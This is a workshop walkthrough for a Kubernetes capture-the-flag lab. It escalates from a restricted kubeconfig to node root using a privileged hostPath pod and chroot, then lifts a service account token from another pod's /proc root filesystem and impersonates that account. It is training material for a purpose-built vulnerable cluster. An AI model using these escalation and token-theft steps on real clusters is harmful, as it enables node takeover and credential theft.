HckSyd2023 Kubernetes Workshop
Welcome⌗
Welcome to the workshop :)
All you’ll need to get involved is:
- kubectl
(Optional) Creating the lab⌗
Pre-requisites:
- Vagrant
- Virtualbox
- A stable internet connection
The project is located here.
Use vagrant to create the machines:
vagrant up
vagrant ssh kubemaster
Run two deploy scripts to join the two nodes to the cluster and set up the lab:
sh deploy.sh
cd kubernetes-workshop
sh deploy.sh
Getting connected to the lab⌗
The lab defines a SOCKS proxy that allows us to connect to resources via the kubemaster machine. You’ll need to keep the HTTPS_PROXY environment variable populated with the SOCKS proxy. kubectl ignores proxychains (tell me about it), so you’ll need to do it this way:
export HTTPS_PROXY=socks5://ip.of.machine.hosting:1080
This IP address will be 127.0.0.1 if you self-host the lab; if you are connecting to another instance, use the IP of the machine hosting the cluster (i.e. it should be provided to you).
If you are self-deploying, during the last step of deploying demo-vulnerable-path you should see:
http://ip.goes.here.plz:8080/ to get your config, and off you go!
Take note of this, it’s where you’ll get your first starting kubeconfig.
If you are working in someone else’s lab environment, then this URL should also be provided.
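If you want to sanity-check the tunnel before touching kubectl, you can point curl at the same proxy explicitly (a rough sketch; substitute whichever IP and URL apply to your lab):
# -x forces curl through the SOCKS proxy regardless of URL scheme; any HTTP status back means the tunnel works
curl -s -x "$HTTPS_PROXY" http://ip.goes.here.plz:8080/ -o /dev/null -w '%{http_code}\n'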
Goals⌗
The lab environment consists of three nodes:
- kubemaster
- kubenode01
- kubenode02
Starting with a limited-access Kubernetes config, your goal is to escalate privileges and access the system-manager-configuration secret. Along the way there are a number of flags, which require you to:
- Connect and communicate with the cluster, and retrieve a secret
- Deploy a malicious pod to take control of a node
- Explore running containers on nodes to discover service accounts
- Explore the cluster as a service account to find the final flag
Two additional flags are also available for those who look into the container registry 👀.
Now if you don’t want any spoilers and just want to give it a go…
Connect and communicate⌗
To retrieve our initial kubeconfig:
curl ip.goes.here.plz:8080 > kubeconfig #the IP _should_ be 10.244.2.2
We can then use this config with kubectl:
kubectl --kubeconfig=kubeconfig version
Rather than having to type --kubeconfig= all the time, we can opt to move this file so that it’s our user’s Kubernetes configuration:
mkdir -p ~/.kube/
mv kubeconfig ~/.kube/config
Just don’t overwrite your production config if you already use K8S!
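If you do already have a config there, a less destructive option (just a suggestion, not part of the lab) is to point kubectl at the file for this shell session via the KUBECONFIG environment variable:
export KUBECONFIG="$PWD/kubeconfig"   # kubectl will use this file instead of ~/.kube/config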
Now, let’s use this to investigate!
Let’s see what our permissions are:
kubectl auth can-i --list
Alright, let’s check out secrets!
kubectl get secrets
NAME             TYPE                                  DATA   AGE
dev-user-token   kubernetes.io/service-account-token   3      19m
first-flag       Opaque                                1      19m
Well, one of these looks relevant!
kubectl get secret first-flag -o json
Surely you can figure out the incredibly complex encryption! (CyberChef is always a help).
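If you want to do it all from the terminal, something like this works (a sketch: the data key is assumed to be flag here, so check the JSON output above for the real key name):
# Pull the secret's data field out and base64-decode it
kubectl get secret first-flag -o jsonpath='{.data.flag}' | base64 -d; echo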
Bad PODs⌗
Alright, from here we are really going to get into the weeds. Feel free to ask lots of questions, because this part is going to assume you know quite a bit about containers and how they work under the hood, as well as Linux.
Okay, so our restricted user has access to create pods in our namespace, so let’s create a malicious pod and get more access.
When creating our bad pod, we should really try to use images that already exist in the cluster. So what should we use? Well, let’s see if we can view any existing pods:
kubectl get pods
NAME                     READY   STATUS    RESTARTS   AGE
dev-space-key-provider   1/1     Running   0          9m27s
test-box                 1/1     Running   0          9m27s
kubectl describe pod test-box
In here we can find:
image: 192.168.0.2:5000/tinycore:latest
That sounds handy (also, that looks like a local registry 👀), so let’s use it!
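As an aside, you can pull that image field straight out with jsonpath instead of scanning the describe output:
kubectl get pod test-box -o jsonpath='{.spec.containers[*].image}'; echo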
Let’s make a pod that is a single container that:
- Runs as root
- Mounts the node it’s run on
We can then use archaic Linux magic (chroot) to start playing with the node!
Let’s make a pod config file, maybe our_cool_pod.yaml, and push it into the cluster:
apiVersion: v1
kind: Pod
metadata:
  name: put-your-own-name-here-or-ill-find-you
  labels:
    cool: labels
    are: cool
spec:
  hostNetwork: true #
  hostPID: true     # If you want systemctl or ps to work, these are important
  hostIPC: true     #
  containers:
  - name: super-cool-normal-pod
    image: 192.168.0.2:5000/tinycore:latest
    securityContext:
      privileged: true
      runAsUser: 0
      runAsGroup: 0
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ] # Keep our pod alive!
  nodeSelector:
    kubernetes.io/hostname: kubenode01 # Optional, but do this ;)
  volumes:
  - name: noderoot
    hostPath:
      path: /
kubectl apply -f our_cool_pod.yaml
Let’s check on our pod and see if it’s up and running:
kubectl get pod put-your-own-name-here-or-ill-find-you
NAME                                     READY   STATUS    RESTARTS   AGE
put-your-own-name-here-or-ill-find-you   1/1     Running   0          4s
Now let’s jump into it!
kubectl exec put-your-own-name-here-or-ill-find-you -it -- /bin/sh
Cool, this is our container, and if we navigate to /host we’ll see the filesystem of the node. Since we’re running as root (UID and GID 0), we can read and edit any of the files on the node! Maybe there’s a file here you can spot ;).
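A few places that are usually worth a poke on any node you’ve just mounted (only a hint, the flag’s actual location is yours to find):
ls -la /host/root /host/home/* /host/etc/kubernetes 2>/dev/null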
Alright, that’s great, but we kind of want to be able to run commands on our node… do we need to set up a reverse shell or something? No! chroot to the rescue:
chroot /host /bin/bash
Moving around a node⌗
Alright, our node is running other workloads, right? From other namespaces! Well, this is where we can use some sneaky tricks:
By default, a token for the namespace’s default service account is mounted inside each container, so if we do:
echo $(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
We can find out what namespace a pod is being run in.
Secondly, since we are on the node now, we can look at all the PIDs being run by the container runtime… which is uh…
ps aux
root ... /usr/bin/crun --root /run/runc --systemd-c
CRUN! It’s CRUN! With a slightly different root folder? Weird. Okay, let’s see what containers are running:
crun --root /run/runc list
Now I’m not going to put the output here… it’s a lot and it’s mostly useless. The important part is that we can see the PIDs of the containers, though (using crun --root /run/runc list | cut -d$' ' -f 2 for all you bash lovers):
0
0
0
2001
2180
2345
2353
8037
Now, containers are just processes that are told to use a different root folder and given managed resources. Where does Linux store these file systems, though? Well…:
/proc/2001/root/
/proc/2180/root/
/proc/2345/root/
Yup, it stores them in a folder called root under /proc/<pid>/. Okay, so we know that each of these is a pod that has an auto-mounted service account token…
echo $(cat /proc/2001/root/var/run/secrets/kubernetes.io/serviceaccount/namespace)
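If you’d rather not check every PID by hand, a small loop does the rounds (a sketch, assuming the same crun root as above; containers without a mounted token are skipped silently):
# Column 2 of `crun list` is the PID; NR>1 skips the header row
for pid in $(crun --root /run/runc list | awk 'NR>1 {print $2}'); do
  ns="/proc/$pid/root/var/run/secrets/kubernetes.io/serviceaccount/namespace"
  [ -f "$ns" ] && echo "$pid: $(cat "$ns")"
done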
Cool, we have a way to figure out which pods belong to which namespaces. Eventually, you’ll find an interesting pod:
echo $(cat /proc/2353/root/var/run/secrets/kubernetes.io/serviceaccount/namespace)
system-manager
This container looks exciting, let’s take a closer look… by chrooting in ;)
chroot /proc/2353/root
cat /etc/hostname
something-like-rancher
Okay, well, Rancher is used to configure other services, sometimes even Kubernetes, so maybe this container has:
- A mounted secret
- A secret given to the process
- A privileged Kubernetes service account
Let’s go through and check one by one:
/ # mount
mount: no /proc/mounts
Okay… no easy way to find out mounts.
/ # ps
PID USER COMMAND
1 tc /bin/sh -c -- while true; do sleep 30; done;
Alright, the main process PID is 1, so let’s check out its environment:
/ # cat /proc/1/environ | tr '\0' '\n'
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
TERM=xterm
HOSTNAME=something-like-rancher
KUBERNETES_PORT_443_TCP_PORT=443
KUBERNETES_PORT_443_TCP_ADDR=10.96.0.1
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
KUBERNETES_PORT=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP=tcp://10.96.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
HOME=/home/tc
Okay, nothing too interesting there. Let’s check out the service account.
Let’s take a look at the token (stored in /var/run/secrets/kubernetes.io/serviceaccount/token) in a JWT decoder like https://jwt.io/.
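If you’d rather not paste tokens into a website, the payload is just base64url-encoded JSON, so you can decode it in place (a rough sketch; the padding fix-up is only there to keep base64 -d happy):
# Grab the second dot-separated field (the payload) and convert base64url -> base64
payload=$(cut -d '.' -f 2 /var/run/secrets/kubernetes.io/serviceaccount/token | tr '_-' '/+')
while [ $(( ${#payload} % 4 )) -ne 0 ]; do payload="${payload}="; done
echo "$payload" | base64 -d; echo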
{
  "aud": [
    "https://kubernetes.default.svc.cluster.local"
  ],
  "exp": 1732189135,
  "iat": 1700653135,
  "iss": "https://kubernetes.default.svc.cluster.local",
  "kubernetes.io": {
    "namespace": "system-manager",
    "pod": {
      "name": "something-like-rancher",
      "uid": "64b447cd-275a-428b-b6da-a0cfde91acaf"
    },
    "serviceaccount": {
      "name": "manager",
      "uid": "3eac23fd-c9fe-4a43-8368-25066d7629b0"
    },
    "warnafter": 1700656742
  },
  "nbf": 1700653135,
  "sub": "system:serviceaccount:system-manager:manager"
}
Okay, well, I can confirm that the service account name manager is definitely not standard, so maybe it has permissions.
Impersonating a service account⌗
Let’s craft a new Kubernetes config, sa-config, that we can use to authenticate as this service account. We can model it off our existing one, with a few small tweaks:
# ...
contexts:
- context:
    cluster: mycluster
    namespace: system-manager
    user: manager
  name: system-manager
current-context: system-manager
kind: Config
preferences: {}
users:
- name: manager
  user:
    token: the-token-from-/var/run/secrets/kubernetes.io/serviceaccount/token
kubectl --kubeconfig=sa-config get pod
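Same trick as before: before hunting for the flag, it’s worth asking the API what this account is actually allowed to do:
kubectl --kubeconfig=sa-config auth can-i --list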
From here, the final flag is within grasp. Think about what new resources this service account might have access to that we want.
Good luck, and thanks for giving the workshop lab a go!
Container registry flags⌗
I’m going to leave this mostly as a bonus challenge for you to figure out. To start your journey, look at the /etc/containers/registries.conf.d/ folder on one of the nodes within the cluster.
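If you want a gentle nudge (this assumes the registry spotted earlier at 192.168.0.2:5000 speaks the standard Docker Registry v2 API and is reachable through your proxy), listing its catalogue is a reasonable first move:
curl -s -x "$HTTPS_PROXY" http://192.168.0.2:5000/v2/_catalog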
If you get stuck on the second container, check out:
Good luck!